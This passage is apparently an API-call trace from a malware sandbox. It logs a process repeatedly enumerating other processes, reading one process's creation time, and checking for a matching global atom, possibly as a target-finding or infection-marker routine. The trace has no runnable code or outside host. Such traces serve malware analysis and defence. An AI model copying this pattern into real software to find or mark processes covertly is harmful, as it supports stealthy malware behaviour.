	[0088.600] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.600] CloseHandle (hObject=0x20c) returned 1
	[0088.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0088.600] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.600] CloseHandle (hObject=0x20c) returned 1
	[0088.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0088.600] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.601] CloseHandle (hObject=0x20c) returned 1
	[0088.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0088.601] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.601] CloseHandle (hObject=0x20c) returned 1
	[0088.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0088.601] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.601] CloseHandle (hObject=0x20c) returned 1
	[0088.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0088.601] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.601] CloseHandle (hObject=0x20c) returned 1
	[0088.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0088.601] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0088.602] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0088.602] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0088.602] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0088.602] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0088.602] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0088.602] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0088.602] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0088.602] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0088.602] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0088.602] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0088.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0088.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0088.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0088.603] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.603] CloseHandle (hObject=0x20c) returned 1
	[0088.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0088.603] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.603] CloseHandle (hObject=0x20c) returned 1
	[0088.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0088.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0088.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0088.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0088.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0088.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0088.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0088.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0088.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0088.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0088.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0088.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0088.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0088.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0088.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0088.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0088.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0088.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0088.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0088.683] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.683] CloseHandle (hObject=0x20c) returned 1
	[0088.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0088.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0088.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0088.683] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.683] CloseHandle (hObject=0x20c) returned 1
	[0088.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0088.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0088.683] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.683] CloseHandle (hObject=0x20c) returned 1
	[0088.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0088.684] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.684] CloseHandle (hObject=0x20c) returned 1
	[0088.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0088.684] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.684] CloseHandle (hObject=0x20c) returned 1
	[0088.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0088.684] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.684] CloseHandle (hObject=0x20c) returned 1
	[0088.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0088.684] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.684] CloseHandle (hObject=0x20c) returned 1
	[0088.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0088.684] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.684] CloseHandle (hObject=0x20c) returned 1
	[0088.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0088.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0088.684] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.685] CloseHandle (hObject=0x20c) returned 1
	[0088.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0088.685] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.685] CloseHandle (hObject=0x20c) returned 1
	[0088.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0088.685] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.685] CloseHandle (hObject=0x20c) returned 1
	[0088.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0088.685] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.685] CloseHandle (hObject=0x20c) returned 1
	[0088.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0088.685] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.685] CloseHandle (hObject=0x20c) returned 1
	[0088.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0088.685] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.685] CloseHandle (hObject=0x20c) returned 1
	[0088.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0088.686] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.686] CloseHandle (hObject=0x20c) returned 1
	[0088.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0088.686] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.686] CloseHandle (hObject=0x20c) returned 1
	[0088.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0088.686] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.686] CloseHandle (hObject=0x20c) returned 1
	[0088.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0088.686] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.686] CloseHandle (hObject=0x20c) returned 1
	[0088.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0088.686] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.686] CloseHandle (hObject=0x20c) returned 1
	[0088.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0088.686] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.687] CloseHandle (hObject=0x20c) returned 1
	[0088.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0088.687] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.687] CloseHandle (hObject=0x20c) returned 1
	[0088.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0088.687] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.687] CloseHandle (hObject=0x20c) returned 1
	[0088.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0088.687] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.687] CloseHandle (hObject=0x20c) returned 1
	[0088.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0088.687] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.687] CloseHandle (hObject=0x20c) returned 1
	[0088.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0088.688] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.688] CloseHandle (hObject=0x20c) returned 1
	[0088.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0088.688] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.688] CloseHandle (hObject=0x20c) returned 1
	[0088.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0088.688] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.688] CloseHandle (hObject=0x20c) returned 1
	[0088.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0088.688] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.688] CloseHandle (hObject=0x20c) returned 1
	[0088.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0088.688] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.688] CloseHandle (hObject=0x20c) returned 1
	[0088.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0088.688] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.688] CloseHandle (hObject=0x20c) returned 1
	[0088.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0088.689] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.689] CloseHandle (hObject=0x20c) returned 1
	[0088.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0088.689] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0088.689] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0088.689] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0088.689] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0088.690] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0088.690] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0088.690] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0088.690] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0088.690] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0088.690] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0088.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0088.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0088.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0088.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0088.691] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.691] CloseHandle (hObject=0x20c) returned 1
	[0088.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0088.691] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.691] CloseHandle (hObject=0x20c) returned 1
	[0088.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0088.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0088.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0088.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0088.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0088.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0088.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0088.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0088.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0088.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0088.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0088.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0088.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0088.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0088.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0088.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0088.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0088.766] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0088.766] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0088.766] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.766] CloseHandle (hObject=0x20c) returned 1
	[0088.766] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0088.766] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0088.766] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0088.766] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.766] CloseHandle (hObject=0x20c) returned 1
	[0088.766] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0088.766] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0088.767] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.767] CloseHandle (hObject=0x20c) returned 1
	[0088.767] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0088.767] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.767] CloseHandle (hObject=0x20c) returned 1
	[0088.767] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0088.767] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.767] CloseHandle (hObject=0x20c) returned 1
	[0088.767] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0088.767] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.767] CloseHandle (hObject=0x20c) returned 1
	[0088.767] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0088.767] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.767] CloseHandle (hObject=0x20c) returned 1
	[0088.767] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0088.767] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.768] CloseHandle (hObject=0x20c) returned 1
	[0088.768] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0088.768] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0088.768] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.768] CloseHandle (hObject=0x20c) returned 1
	[0088.768] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0088.768] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.768] CloseHandle (hObject=0x20c) returned 1
	[0088.768] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0088.768] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.768] CloseHandle (hObject=0x20c) returned 1
	[0088.768] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0088.768] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.768] CloseHandle (hObject=0x20c) returned 1
	[0088.768] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0088.769] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.769] CloseHandle (hObject=0x20c) returned 1
	[0088.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0088.769] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.769] CloseHandle (hObject=0x20c) returned 1
	[0088.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0088.769] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.769] CloseHandle (hObject=0x20c) returned 1
	[0088.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0088.769] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.769] CloseHandle (hObject=0x20c) returned 1
	[0088.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0088.769] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.769] CloseHandle (hObject=0x20c) returned 1
	[0088.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0088.770] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.770] CloseHandle (hObject=0x20c) returned 1
	[0088.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0088.770] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.770] CloseHandle (hObject=0x20c) returned 1
	[0088.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0088.770] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.770] CloseHandle (hObject=0x20c) returned 1
	[0088.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0088.770] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.770] CloseHandle (hObject=0x20c) returned 1
	[0088.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0088.770] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.770] CloseHandle (hObject=0x20c) returned 1
	[0088.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0088.770] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.770] CloseHandle (hObject=0x20c) returned 1
	[0088.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0088.771] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.771] CloseHandle (hObject=0x20c) returned 1
	[0088.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0088.771] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.771] CloseHandle (hObject=0x20c) returned 1
	[0088.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0088.771] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.771] CloseHandle (hObject=0x20c) returned 1
	[0088.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0088.771] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.771] CloseHandle (hObject=0x20c) returned 1
	[0088.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0088.771] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.771] CloseHandle (hObject=0x20c) returned 1
	[0088.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0088.772] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.772] CloseHandle (hObject=0x20c) returned 1
	[0088.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0088.772] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.772] CloseHandle (hObject=0x20c) returned 1
	[0088.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0088.772] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.772] CloseHandle (hObject=0x20c) returned 1
	[0088.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0088.772] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0088.773] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
